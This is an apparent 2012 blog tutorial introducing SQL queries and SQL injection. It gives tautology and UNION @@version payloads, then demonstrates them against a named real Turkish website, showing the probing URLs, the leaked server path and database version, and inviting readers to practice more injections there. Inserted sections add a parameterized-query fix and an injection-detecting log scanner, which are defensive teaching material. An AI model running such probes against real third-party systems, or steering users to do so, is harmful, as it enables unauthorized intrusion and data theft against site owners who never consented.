January 5, 2012

SQL injection - Part 1

Last time we finished talking about the Web Proxy and its features.

We learned how to use some of its main functions, such as intercepting requests, targeting them, repeating requests and even using them for brute-force attacks.

Lesson #5 : SQL injection : Session No.1

Today we're gonna discuss the famous attack called SQL injection.

Well, first let's step into the language itself and learn some basic phrases.

SQL (or Structured Query Language) is a programming language designed for managing data in relational database management systems (RDBMS).
Its scope includes data insert, query, update and delete, schema creation and modification, and data access control.

The SQL language is subdivided into several language elements, including:

+ Clauses, which are constituent components of statements and queries.
+ Expressions, which can produce either scalar values or tables consisting of columns and rows of data.
+ Predicates, which specify conditions that can be evaluated to SQL three-valued logic (3VL) or Boolean (true/false/unknown) truth values and which are used to limit the effects of statements and queries, or to change program flow.
+ Queries, which retrieve the data based on specific criteria. This is the most important element of SQL.
+ Statements, which may have a persistent effect on schemata and data, or which may control transactions, program flow, connections, sessions, or diagnostics.

O.k., after the boring part... let's jump into queries:

The most common operation in SQL is the query, which is performed with the declarative SELECT statement. SELECT retrieves data from one or more tables, or expressions. Standard SELECT statements have no persistent effects on the database.

Queries allow the user to describe desired data, leaving the database management system (DBMS) responsible for planning, optimizing, and performing the physical operations necessary to produce that result as it chooses.

+ The FROM clause indicates the table(s) from which data is to be retrieved.
+ The WHERE clause includes a comparison predicate, which restricts the rows returned by the query. The WHERE clause eliminates from the result set all rows for which the comparison predicate does not evaluate to True.

And now... The example: :mrgreen: :mrgreen: 

This query returns a list of expensive books. * means "return all of the table's columns",
FROM [tableName] names the table (in our case Book), WHERE keeps only the rows whose "price" column holds a value larger than 100.00, and ORDER BY sorts the returned rows by the "title" column.
------------------------------------------
SELECT *
FROM Book
WHERE price > 100.00
ORDER BY title;
------------------------------------------
So the answer can look like this:

Title                       | Price  | Author
----------------------------+--------+---------------
How to become a Hacker      | 405.7  | Ido.N
The Joy of Pink             | 132.99 | Pink Panther
An Introduction to nonsense | 221.50 | Garfield
Pitfalls of Beer            | 102.00 | Homer Simpson

**If you want to see only the "Price" and "Title", all you need to do is SELECT the
right columns.
------------------------------------------
SELECT title, price
FROM Book
...
------------------------------------------

This is hardly more than the basics, but you can continue reading here:
http://en.wikipedia.org/wiki/SQL

:ugeek: :ugeek: So now let's talk a little about what exactly an SQL injection is :ugeek: :ugeek:

SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website to perform operations on the database (often to dump the database content to the attacker) other than the usual operations as intended by the designer. 

SQL injection is a code injection technique that exploits a security vulnerability in a website's software. 
The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. 

SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into an SQL statement. The result is that the end user of the application can potentially manipulate the statements performed on the database.

Now that we understand what the attack is, we can dive into the injection itself.
Let's look at a simple injection.

This is the developer side, or more commonly the server side:

------------------------------------------
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
------------------------------------------

Here we can see a variable which holds the text of an SQL query. The query takes a value from the end user in a parameter called "userName" and retrieves the matching row from the table "users".
After retrieving the user's name from the database, the web form opens a block with this name (if it exists, else it drops an error).

If the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable to:


------------------------------------------
' or '1'='1
------------------------------------------

renders the following SQL statement by the parent language:


------------------------------------------
SELECT * FROM users WHERE name = '' OR '1'='1';
------------------------------------------

This example could be used to force the selection of a valid username, because the evaluation of '1'='1' is always true.
Beyond that simple query, there is a way to "break" the query like this:


------------------------------------------
' OR '1'='1' UNION SELECT @@version';
------------------------------------------

This kind of injection will retrieve two result sets, one with the valid user and the second with the database's version.
But they will be displayed together.
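To make the concatenation problem concrete, here is an added example in Python against an in-memory SQLite database. This is not code from the post; the users table, its rows and the function names are constructed for the demo. It puts the vulnerable string-building next to the parameterized form and runs the ' or '1'='1 input from above through both, so you can see why the fix is to send user input as a bound value rather than as part of the SQL text:

```python
import sqlite3


def make_db():
    # Constructed sample database for the demo (not any real site's schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (name, email) VALUES (?, ?)",
        [("alice", "alice@example.test"),
         ("bob", "bob@example.test"),
         ("carol", "carol@example.test")],
    )
    return conn


def lookup_vulnerable(conn, user_name):
    # Mirrors the server-side line from the post: the input is pasted into the
    # SQL text, so a quote inside user_name changes the structure of the statement.
    statement = "SELECT * FROM users WHERE name = '" + user_name + "';"
    return conn.execute(statement).fetchall()


def lookup_safe(conn, user_name):
    # Parameterized query: the driver passes user_name as a value, never as SQL,
    # so the same payload is simply a name that no row has.
    statement = "SELECT * FROM users WHERE name = ?;"
    return conn.execute(statement, (user_name,)).fetchall()


def demo():
    """Row counts for an honest lookup and for the tautology payload, both ways."""
    conn = make_db()
    payload = "' or '1'='1"   # the payload from the post
    return {
        "honest_vulnerable": len(lookup_vulnerable(conn, "alice")),   # 1 row
        "honest_safe": len(lookup_safe(conn, "alice")),               # 1 row
        "payload_vulnerable": len(lookup_vulnerable(conn, payload)),  # every row
        "payload_safe": len(lookup_safe(conn, payload)),              # 0 rows
    }


if __name__ == "__main__":
    for key, count in demo().items():
        print(f"{key}: {count} row(s)")
```

With the honest input both functions return the single alice row; with the payload the concatenated version returns all three users because the WHERE clause became name = '' or '1'='1', while the parameterized version returns nothing. The behaviour is the same in SQL Server, which the post targets, because the flaw is in how the statement is assembled, not in the database engine.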

Here is a live example, please use it to view only!

http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=1

This is a trashed Turkish website I encountered a few months ago.
Let's try and inject something... shall we :)

http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=1'

What happened?!? :?: :?: :shock: :shock:

O.k. stay calm.. this is exactly what we wanted to accomplish.

Look at the error on the first line:


------------------------------------------
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near '\'. (severity 15) in /usr/local/www/ieowwwroot/nobetler.php on line 82
------------------------------------------

It says:
Warning: means the code will still run. (Errors can crash the site, but warnings don't.)
mssql_query message: the warning's details.
** Those warnings are the hacker's best friend, because when I tell you what you did wrong, you know exactly what to change in order to make it work.

For example:
----------------------------------------------------------------------------------------------------
your query:

http://www.someDomain.com/BFid=1' make breakfast;

breakfast_query_message: 'there is no egg in the pan'

your next query:

http://www.someDomain.com/BFid=1' take out an egg from the fridge;....make breakfast;

breakfast_query_message: 'omelet is ready'
----------------------------------------------------------------------------------------------------
Where the warning occurred:
in /usr/local/www/ieowwwroot/nobetler.php on line 82

You can see the path disclosure, which counts as a vulnerability in itself.
/usr/local/www/ - means the server is Unix-like (the path layout is Linux/BSD style).

/ieowwwroot/ is the directory the web service lives in, and the page that
emitted the warning is "nobetler.php".

Now that we understand what went on, we can try to inject ourselves.

Copy and paste the next Url:

http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=1 or 1=1

Now investigate the differences between bolgeID=1 and bolgeID=1 or 1=1

You'll see that the first displays only one option, and the other displays all the options...
This is exactly what we implemented earlier in the example above (remember? 8-) ).

This means there is an SQL injection at hand, and the database will answer the queries we inject through the parameter.
It seems the query is:


------------------------------------------
statement = "SELECT * FROM [sometable] WHERE ID = " + bolgeID + ";"
------------------------------------------

So as I told you before... let's try and "break" this query into retrieving data it shouldn't retrieve... :twisted: :twisted:

Copy and paste the next Url:

http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=@@version

Now you will see that the warning changed, and the injection succeeded.

Let's watch the warning.

Warning: mssql_query() [function.mssql-query]: message: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2, v.2825) to data type int. (severity 16) in /usr/local/www/ieowwwroot/nobetler.php on line 82

You can see that I entered "@@version" into the parameter "bolgeID".
The following error was returned:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2, v.2825) ' to data type int

This means there was a problem converting my input to the type this parameter is supposed to receive --> "to data type int" (int means integer, i.e. whole numbers).

Also, the query succeeded in retrieving the version of the database:

'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2, v.2825) '
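The two things this lesson has shown so far, the error text leaking out of the page and the odd values arriving in an integer parameter, are also exactly what a defender can look for. As an added example that is not from the original post, the following Python scans constructed web-server access-log lines for the request shapes seen above and checks a response body for a leaked PHP warning of the kind quoted earlier. The log lines, the client addresses and the list of parameters expected to be integers are assumptions made for the demo; the path nobetler.php, the parameter name bolgeID and the warning text follow the post.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Constructed access-log lines (common log format). Addresses are documentation
# ranges, not real clients; the requests mirror the ones walked through in the post.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Jan/2012:10:00:01 +0200] "GET /nobetler.php?t=b&bolgeID=1 HTTP/1.1" 200 5120
198.51.100.7 - - [05/Jan/2012:10:00:09 +0200] "GET /nobetler.php?t=b&bolgeID=1' HTTP/1.1" 200 812
198.51.100.7 - - [05/Jan/2012:10:00:31 +0200] "GET /nobetler.php?t=b&bolgeID=1%20or%201=1 HTTP/1.1" 200 48211
198.51.100.7 - - [05/Jan/2012:10:01:02 +0200] "GET /nobetler.php?t=b&bolgeID=@@version HTTP/1.1" 200 901
203.0.113.5 - - [05/Jan/2012:10:01:10 +0200] "GET /nobetler.php?t=b&bolgeID=2 HTTP/1.1" 200 5133
"""

# Constructed response body reproducing the warning quoted in the post.
SAMPLE_RESPONSE = ("Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax "
                   "near '\\'. (severity 15) in /usr/local/www/ieowwwroot/nobetler.php on line 82")

# Parameters the application is assumed to expect as integers (demo assumption).
INT_PARAMS = {"bolgeID"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$'
)
# "or X=X" tautologies such as "1 or 1=1"
TAUTOLOGY_RE = re.compile(r"\bor\b\s+(\S+)\s*=\s*\1", re.IGNORECASE)
# server variables (@@version), UNION SELECT and comment sequences
KEYWORD_RE = re.compile(r"(@@\w+|\bunion\b\s+\bselect\b|--|/\*)", re.IGNORECASE)
# PHP warning text that reveals the script path and line number
LEAK_RE = re.compile(r"Warning: (?P<func>\w+)\(\).*? in (?P<path>/\S+) on line (?P<line>\d+)")


def classify_value(name, value):
    """Return the list of reasons a decoded query-string value looks suspicious."""
    reasons = []
    if name in INT_PARAMS:
        try:
            int(value)
        except ValueError:
            reasons.append("non-integer value for integer parameter")
    if value.count("'") % 2 == 1:
        reasons.append("unbalanced single quote")
    if TAUTOLOGY_RE.search(value):
        reasons.append("OR tautology")
    if KEYWORD_RE.search(value):
        reasons.append("SQL keyword or server variable")
    return reasons


def scan_log(text):
    """Yield (client_ip, parameter, decoded_value, reasons) for each suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlparse(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(name, value)
            if reasons:
                findings.append((m.group("ip"), name, value, reasons))
    return findings


def find_error_leaks(body):
    """Return (function, script_path, line) for every PHP warning leaked into a page body."""
    return [(m.group("func"), m.group("path"), int(m.group("line")))
            for m in LEAK_RE.finditer(body)]


if __name__ == "__main__":
    for ip, name, value, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {name}={value!r}: {', '.join(reasons)}")
    for func, path, line in find_error_leaks(SAMPLE_RESPONSE):
        print(f"leaked {func}() warning from {path} line {line}")
```

Run against the sample, the scanner flags the three probing requests (quote, tautology, @@version) and leaves the two ordinary ones alone, and the leak check pulls the script path and line number out of the warning. The integer check is the most reliable of the four: a parameter that is compared to an int column should never carry anything but digits, and the same check applied before the query is built (reject the request if int() fails) removes the injection on that parameter entirely.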

There are a lot of injections that can be performed through this parameter.
I'll let you practice a little :D :D :)

See ya next session, where we discuss the differences between certain databases and dive even deeper into the queries.
Please download SQL Express for next session. :geek:

Thank you for reading.
You're welcome to promote me by messaging the uTest team.

Cheers,
